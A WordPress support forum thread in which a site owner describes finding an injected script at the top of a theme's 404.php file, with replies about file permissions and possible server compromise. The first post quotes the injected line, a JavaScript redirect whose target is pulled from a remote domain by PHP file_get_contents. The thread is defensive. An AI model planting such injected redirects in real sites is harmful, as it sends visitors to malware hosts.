404.php theme hacked - any advices? (6 posts)

  1. talgalili
    Posted 6 years ago #

    Hello people.

    I am writing this in order to
    1) warn other people.
    2) help people who might got this hack
    3) get more tips from more knowledgeable people then me :)

    I entered into one of my sites today and my AVAST antivirus warned me against a Trojan Horse (JS:ScriptIP-inf [Trj])
    That was located inside my theme image files, two of them:
    1) images/ico-catlist.gif\{gzip}
    2) images/ico-arrow.gif\{gzip}

    I searched for them in the source code of the site but couldn't find them.
    I then went to the server and didn't see any changes in those files.
    I then looked for any changes made to any of the files on the site.

    I found that the 404.php file was changed today.
    After opening it I found it had the following code added to the beginning of it (just before the "<?php get_header(); ?>" ) :

    <script>location='http://scan.<?php echo file_get_contents('http:// borntobebest . biz/actual_domain.txt'); ?>/vista1/6/48017/';</script>

    (I added spaces in the URL, just to be on the safe side)

    I erased the extra line and the site stopped to give Trojan warnings.

    Here are my questions:
    1) my theme diractory was CHMOD 775, I changed it to 555 - will this help in the future ?
    2) Why did my homepage suffer from a code injection in the 404.php ? isn't the 404.php file activated only when the page is not found ?

    Any thoughts will be warmly welcomed.


  2. mousewrites
    Posted 6 years ago #

    Check to make sure your index.php files weren't modified as well. I had the same thing happen to me this morning. Same code and everything.

  3. talgalili
    Posted 6 years ago #

    Thanks mousewrites,
    I checked, it wasn't changed.

    Thanks again :)


  4. esmi
    Forum Moderator
    Posted 6 years ago #

  5. UseShots
    Posted 6 years ago #


    I would be warned if Avast reports images as harmful files. Make sure those gif files don't have any extra content.

    If the gif files are real GIF files with no extra content, this could be a sign of another serious problem: the whole server (not just your site) could be hacked so that it serves malicious content for random requests.

    For example, during the Beladen infection I saw AV warnings even for favicon.ico files (you can see screenshots here):

  6. talgalili
    Posted 6 years ago #

    Thanks UseShots, I noted my hosting (site5.com) about it. They said they are fine on their side.

Topic Closed

This topic has been closed to new replies.

About this Topic